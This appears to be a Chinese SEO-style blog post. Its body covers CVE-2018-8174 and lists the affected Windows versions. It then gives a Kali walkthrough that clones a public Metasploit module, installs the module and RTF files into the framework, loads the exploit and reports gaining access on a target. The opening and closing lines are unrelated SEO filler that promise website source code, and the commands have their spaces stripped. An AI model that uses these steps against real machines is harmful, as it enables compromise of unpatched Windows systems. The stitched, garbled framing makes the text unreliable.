大家好,今天来为大家分享安全焦点网站源码分享的一些知识点,和安全焦点信息安全技术峰会的问题解析,大家要是都明白,那么可以忽略,如果不太清楚的话可以看看本篇文章,相信很大概率可以解决您的问题,接下来我们就一起来看看吧!
0x01介绍
2018年4月18日,当时有人往VirusTotal(VT)上传了一个有趣的漏洞利用程序,包括卡巴斯基在内的多个AV厂商成功检测到了这个利用程序,360将该程序标记为针对老版本MicrosoftWord漏洞的通用启发式逻辑类别,随后卡巴斯基提交此漏洞,漏洞编号CVE-2018-8174。攻击者可能拥有一个通过受影响的Microsoft浏览器利用此漏洞的特制网站,然后诱使用户查看该网站。攻击者还可以利用倍入侵的网站或接受或托管用户提供的内容或广告的网站,通过添加可利用此漏洞的特制内容。攻击者还可以在托管浏览器渲染引擎的应用程序或Office文档中嵌入标记为“安全初始化”的ActiveX控件。
0x02影响软件
Windows10
Windows7
Windows8.1
WindowsRT8.1
Server2008
Server2008R2
Server2012
Server2012R2
Server2016
Server1709
Server1803
0x03漏洞利用
客隆源码
kali>gitclonehttps://github.com/0x09AL/CVE-2018-8174-msf.git
将文件CVE-2018-8174.rb复制到/usr/share/metasploit-framework/modules/exploits/windows/fileformat/目录;将CVE-2018-8174.rtf复制到/usr/share/metasploit-framework/data/exploits/目录
启动Metasploit,将新文件重新载入
kali>servicepostgresqlstart
kali>msfconsole
msf>reload_all
msf>useexploit/windows/fileformat/CVE-2018-8174
运行漏洞模块,靶机访问漏洞地址,运行截图如下:
成功获取权限。
关注微信公众号获取更多精彩文章
文章分享结束,安全焦点网站源码分享和安全焦点信息安全技术峰会的答案你都知道了吗?欢迎再次光临本站哦!